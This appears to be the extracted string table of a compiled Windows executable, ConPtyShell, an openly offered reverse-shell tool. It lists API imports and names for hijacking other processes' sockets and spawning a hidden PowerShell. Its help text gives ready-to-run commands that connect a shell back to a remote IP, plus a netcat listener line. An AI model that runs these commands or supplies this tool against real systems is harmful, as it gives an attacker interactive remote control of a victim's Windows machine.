!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
ConPtyShell.exe
ConPtyShellException
DeadlockCheckHelper
LPTHREAD_START_ROUTINE
SocketHijacking
SOCKET_STATE
AFD_GROUP_TYPE
OBJECT_INFORMATION_CLASS
SYSTEM_HANDLE_TABLE_ENTRY_INFO
GENERIC_MAPPING
OBJECT_TYPE_INFORMATION_V2
OBJECT_NAME_INFORMATION
UNICODE_STRING
WSAData
WSAPROTOCOLCHAIN
WSAPROTOCOL_INFO
SOCKADDR_IN
TCP_INFO_v0
linger
IO_STATUS_BLOCK
SOCK_SHARED_INFO
SOCKADDR
SOCKET_CONTEXT
SOCKET_BYTESIN
ParentProcessUtilities
ConPtyShell
STARTUPINFOEX
STARTUPINFO
PROCESS_INFORMATION
SECURITY_ATTRIBUTES
ConPtyShellMainClass
MainClass
mscorlib
System
Exception
Object
MulticastDelegate
ValueType
error_string
deadlockDetected
targetHandle
CloseHandle
WaitForSingleObject
CreateThread
ThreadCheckDeadlock
CheckDeadlockDetected
Invoke
IAsyncResult
AsyncCallback
BeginInvoke
EndInvoke
NTSTATUS_SUCCESS
NTSTATUS_INFOLENGTHMISMATCH
NTSTATUS_BUFFEROVERFLOW
NTSTATUS_BUFFERTOOSMALL
NTSTATUS_PENDING
WSA_FLAG_OVERLAPPED
DUPLICATE_SAME_ACCESS
SystemHandleInformation
PROCESS_DUP_HANDLE
SIO_TCP_INFO
SG_UNCONSTRAINED_GROUP
SG_CONSTRAINED_GROUP
IOCTL_AFD_GET_CONTEXT
EVENT_ALL_ACCESS
SynchronizationEvent
INFINITE
WSADuplicateSocket
WSASocket
WSAGetLastError
getpeername
WSAIoctl1
closesocket
OpenProcess
DuplicateHandle
GetCurrentProcess
NtQueryObject
NtQuerySystemInformation
NtCreateEvent
NtDeviceIoControlFile1
ioctlsocket
NtQuerySystemInformationDynamic
QueryObjectTypesInfo
AlignUp
GetTypeIndexByName
System.Collections.Generic
List`1
DuplicateSocketsFromHandles
FilterAndOrderSocketsByBytesIn
GetSocketTcpInfo
DuplicateSocketFromHandle
NtQueryObjectDynamic
System.Diagnostics
Process
GetSocketsTargetProcess
IsSocketInherited
IsSocketOverlapped
DuplicateTargetProcessSocket
SetSocketBlockingMode
value__
SocketOpen
SocketBound
SocketBoundUdp
SocketConnected
SocketClosed
GroupTypeNeither
GroupTypeConstrained
GroupTypeUnconstrained
ObjectBasicInformation
ObjectNameInformation
ObjectTypeInformation
ObjectAllTypesInformation
ObjectHandleInformation
UniqueProcessId
CreatorBackTraceIndex
ObjectTypeIndex
HandleAttributes
HandleValue
GrantedAccess
GenericRead
GenericWrite
GenericExecute
GenericAll
TypeName
TotalNumberOfObjects
TotalNumberOfHandles
TotalPagedPoolUsage
TotalNonPagedPoolUsage
TotalNamePoolUsage
TotalHandleTableUsage
HighWaterNumberOfObjects
HighWaterNumberOfHandles
HighWaterPagedPoolUsage
HighWaterNonPagedPoolUsage
HighWaterNamePoolUsage
HighWaterHandleTableUsage
InvalidAttributes
GenericMapping
ValidAccessMask
SecurityRequired
MaintainHandleCount
TypeIndex
ReservedByte
PoolType
DefaultPagedPoolCharge
DefaultNonPagedPoolCharge
Length
MaximumLength
Buffer
wVersion
wHighVersion
iMaxSockets
iMaxUdpDg
lpVendorInfo
szDescription
szSystemStatus
ChainLen
ChainEntries
dwServiceFlags1
dwServiceFlags2
dwServiceFlags3
dwServiceFlags4
dwProviderFlags
ProviderId
dwCatalogEntryId
ProtocolChain
iVersion
iAddressFamily
iMaxSockAddr
iMinSockAddr
iSocketType
iProtocol
iProtocolMaxOffset
iNetworkByteOrder
iSecurityScheme
dwMessageSize
dwProviderReserved
szProtocol
sin_family
sin_port
sin_addr
sin_zero
System.Net.NetworkInformation
TcpState
ConnectionTimeMs
TimestampsEnabled
MinRttUs
BytesInFlight
SndWnd
RcvWnd
RcvBuf
BytesOut
BytesIn
BytesReordered
BytesRetrans
FastRetrans
DupAcksIn
TimeoutEpisodes
SynRetrans
l_onoff
l_linger
status
information
AddressFamily
SocketType
Protocol
LocalAddressLength
RemoteAddressLength
LingerInfo
SendTimeout
ReceiveTimeout
ReceiveBufferSize
SendBufferSize
SocketProperty
CreationFlags
CatalogEntryId
ServiceFlags1
ProviderFlags
GroupID
GroupType
GroupPriority
LastError
AsyncSelecthWnd
AsyncSelectSerialNumber
AsyncSelectwMsg
AsyncSelectlEvent
DisabledAsyncSelectEvents
sa_family
sa_data
SharedData
SizeOfHelperData
Padding
LocalAddress
RemoteAddress
HelperData
handle
Reserved1
PebBaseAddress
Reserved2_0
Reserved2_1
InheritedFromUniqueProcessId
NtQueryInformationProcess
GetParentProcess
errorString
ENABLE_VIRTUAL_TERMINAL_PROCESSING
DISABLE_NEWLINE_AUTO_RETURN
PROC_THREAD_ATTRIBUTE_PSEUDOCONSOLE
EXTENDED_STARTUPINFO_PRESENT
STARTF_USESTDHANDLES
BUFFER_SIZE_PIPE
SW_HIDE
GENERIC_READ
GENERIC_WRITE
FILE_SHARE_READ
FILE_SHARE_WRITE
FILE_ATTRIBUTE_NORMAL
OPEN_EXISTING
STD_INPUT_HANDLE
STD_OUTPUT_HANDLE
STD_ERROR_HANDLE
WSAEWOULDBLOCK
FD_READ
InitializeProcThreadAttributeList
UpdateProcThreadAttribute
CreateProcessEx
CreateProcess
TerminateProcess
SetStdHandle
GetStdHandle
CreatePipe
CreateFile
ReadFile
WriteFile
CreatePseudoConsole
ClosePseudoConsole
SetConsoleMode
GetConsoleMode
AllocConsole
FreeConsole
ShowWindow
GetConsoleWindow
GetModuleHandle
GetProcAddress
System.Net.Sockets
ProtocolType
connect
inet_addr
WSAStartup
WSACreateEvent
WSAEventSelect
WSAWaitForMultipleEvents
WSAResetEvent
WSACloseEvent
NtSuspendProcess
NtResumeProcess
InitWSAThread
connectRemote
TryParseRowsColsFromSocket
CreatePipes
InitConsole
RestoreStdHandles
EnableVirtualTerminalSequenceProcessing
CreatePseudoConsoleWithPipes
ConfigureProcessThread
RunProcess
CreateChildProcessWithPseudoConsole
ThreadReadPipeWriteSocketOverlapped
ThreadReadPipeWriteSocketNonOverlapped
System.Threading
Thread
StartThreadReadPipeWriteSocket
ThreadReadSocketWritePipeOverlapped
ThreadReadSocketWritePipeNonOverlapped
StartThreadReadSocketWritePipe
SpawnConPtyShell
StartupInfo
lpAttributeList
lpReserved
lpDesktop
lpTitle
dwXSize
dwYSize
dwXCountChars
dwYCountChars
dwFillAttribute
dwFlags
wShowWindow
cbReserved2
lpReserved2
hStdInput
hStdOutput
hStdError
hProcess
hThread
dwProcessId
dwThreadId
nLength
lpSecurityDescriptor
bInheritHandle
HelpRequired
CheckArgs
DisplayHelp
CheckRemoteIpArg
CheckInt
ParseRows
ParseCols
ParseCommandLine
ConPtyShellMain
message
hObject
hHandle
dwMilliseconds
lpThreadAttributes
dwStackSize
lpStartAddress
lpParameter
dwCreationFlags
lpThreadId
System.Runtime.InteropServices
OutAttribute
threadParams
tHandle
object
method
lpParam
callback
result
socketHandle
processId
pinnedBuffer
addressFamily
InAttribute
socketType
protocolType
lpProtocolInfo
group1
namelen
dwIoControlCode
lpvInBuffer
cbInBuffer
lpvOutBuffer
cbOutBuffer
lpcbBytesReturned
lpOverlapped
lpCompletionRoutine
processAccess
MarshalAsAttribute
UnmanagedType
hSourceProcessHandle
hSourceHandle
hTargetProcessHandle
lpTargetHandle
dwDesiredAccess
dwOptions
objectHandle
informationClass
informationPtr
informationLength
returnLength
SystemInformationClass
SystemInformation
SystemInformationLength
EventHandle
DesiredAccess
ObjectAttributes
EventType
InitialState
FileHandle
ApcRoutine
ApcContext
IoStatusBlock
IoControlCode
InputBuffer
InputBufferLength
OutputBuffer
OutputBufferLength
infoClass
infoLength
address
ObjectName
sockets
socket
tcpInfoOut
targetProcess
parentProcess
overlappedSocket
processHandle
processInformationClass
processInformation
processInformationLength
dwAttributeCount
lpSize
attribute
lpValue
cbSize
lpPreviousValue
lpReturnSize
lpApplicationName
lpCommandLine
lpProcessAttributes
bInheritHandles
lpEnvironment
lpCurrentDirectory
lpStartupInfo
lpProcessInformation
uExitCode
nStdHandle
hReadPipe
hWritePipe
lpPipeAttributes
lpFileName
dwShareMode
SecurityAttributes
dwCreationDisposition
dwFlagsAndAttributes
hTemplateFile
lpBuffer
nNumberOfBytesToRead
lpNumberOfBytesRead
nNumberOfBytesToWrite
lpNumberOfBytesWritten
hInput
hOutput
hConsoleHandle
nCmdShow
lpModuleName
hModule
procName
protocolInfo
addrsize
hostshort
wVersionRequested
wsaData
Socket
hEventObject
lNetworkEvents
cEvents
lphEvents
fWaitAll
dwTimeout
fAlertable
hEvent
remoteIp
remotePort
shellSocket
InputPipeRead
InputPipeWrite
OutputPipeRead
OutputPipeWrite
oldStdIn
oldStdOut
oldStdErr
handlePseudoConsole
ConPtyInputPipeRead
ConPtyOutputPipeWrite
attributes
sInfoEx
commandLine
hChildProcess
upgradeShell
arguments
ipString
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
String
Concat
DllImportAttribute
kernel32.dll
Kernel32.dll
IntPtr
op_Inequality
Marshal
FreeHGlobal
WS2_32.DLL
ws2_32.dll
Ws2_32.dll
WSAIoctl
ntdll.dll
NtDeviceIoControlFile
AllocHGlobal
ReadIntPtr
ToInt64
get_Size
RuntimeTypeHandle
GetTypeFromHandle
PtrToStructure
SizeOf
op_Explicit
PtrToStringUni
op_Equality
get_Count
Enumerator
GetEnumerator
get_Current
MoveNext
IDisposable
Dispose
<FilterAndOrderSocketsByBytesIn>b__0
Comparison`1
CS$<>9__CachedAnonymousMethodDelegate1
CompilerGeneratedAttribute
UInt64
CompareTo
get_Id
ToString
Console
WriteLine
StructLayoutAttribute
LayoutKind
get_Handle
GetProcessById
ToInt32
ArgumentException
user32.dll
kernel32
Format
Convert
System.Text
Encoding
get_ASCII
GetString
TryParse
GetLastWin32Error
ParameterizedThreadStart
System.IO
TextWriter
get_Out
System.Net
IPAddress
Contains
.cctor
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
[-] ConPtyShellException:
Cannot open target process with pid
for DuplicateHandle access
\Device\Afd
No sockets found, so no hijackable sockets :( Exiting...
ioctlsocket failed with return code
and wsalasterror:
WSAStartup failed with error code: {0}
Specified port is invalid:
WSAConnect failed with error code: {0}
Could not create the InputPipe
Could not create the OutputPipe
CONOUT$
CONIN$
Could not get console mode
Could not enable virtual terminal processing
Could not calculate the number of bytes for the attribute list.
Could not set up attribute list.
Could not set pseudoconsole thread attribute.
Could not create process.
kernel32
CreatePseudoConsole
CreatePseudoConsole function found! Spawning a fully interactive shell
No \Device\Afd objects found. Socket duplication failed.
{0}Could not connect to ip {1} on port {2}
{{{ConPtyShellException}}}
{0}Could not create psuedo console. Error Code {1}
Could not upgrade shell to fully interactive because ConPTY is not compatible on this system
CreatePseudoConsole function not found! Spawning a netcat-like interactive shell...
ConPtyShell kindly exited.
--help
ConPtyShell: Not enough arguments. 2 Arguments required. Use --help for additional help.
ConPtyShell: Invalid remoteIp value
ConPtyShell: Invalid integer value
powershell.exe
upgrade
ConPtyShell - Fully Interactive Reverse Shell for Windows
Author: splinter_code
License: MIT
Source: https://github.com/antonioCoco/ConPtyShell
ConPtyShell - Fully interactive reverse shell for Windows
Properly set the rows and cols values. You can retrieve it from
your terminal with the command "stty size".
You can avoid to set rows and cols values if you run your listener
with the following command:
stty raw -echo; (stty size; cat) | nc -lvnp 3001
If you want to change the console size directly from powershell
you can paste the following commands:
$width=80
$height=24
$Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height)
$Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height)
Usage:
ConPtyShell.exe remote_ip remote_port [rows] [cols] [commandline]
Positional arguments:
remote_ip The remote ip to connect
remote_port The remote port to connect
[rows] Rows size for the console
Default: "24"
[cols] Cols size for the console
Default: "80"
[commandline] The commandline of the process that you are going to interact
Default: "powershell.exe"
Examples:
Spawn a reverse shell
ConPtyShell.exe 10.0.0.2 3001
Spawn a reverse shell with specific rows and cols size
ConPtyShell.exe 10.0.0.2 3001 30 90
Spawn a reverse shell (cmd.exe) with specific rows and cols size
ConPtyShell.exe 10.0.0.2 3001 30 90 cmd.exe
Upgrade your current shell with specific rows and cols size
ConPtyShell.exe upgrade shell 30 90
[-] ConPtyShellException:
{{{ConPtyShellException}}}
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
ConPtyShell.exe
LegalCopyright
OriginalFilename
ConPtyShell.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0